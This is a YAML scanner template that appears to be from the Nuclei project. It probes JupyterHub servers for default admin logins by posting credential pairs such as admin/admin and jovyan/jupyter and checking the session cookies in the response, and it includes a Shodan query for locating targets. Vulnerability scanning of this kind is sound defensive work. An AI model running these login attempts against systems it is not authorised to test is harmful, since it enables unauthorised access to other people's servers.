id: jupyterhub-default-login
info:
  name: Jupyterhub - Default Admin Discovery
  author: For3stCo1d
  severity: high
  description: Jupyterhub default admin credentials were discovered.
  reference:
    - https://github.com/jupyterhub/jupyterhub
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    shodan-query: http.title:"JupyterHub"
  tags: jupyterhub,default-login
requests:
  - raw:
      - |
        POST /hub/login?next= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password={{pass}}
    attack: pitchfork
    payloads:
      user:
        - admin
        - jovyan
      pass:
        - admin
        - jupyter
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(tolower(all_headers), 'jupyterhub-session-id=')
          - contains(tolower(all_headers), 'jupyterhub-hub-login=')
        condition: and
      - type: status
        status:
          - 302

# Enhanced by mp on 2022/07/15
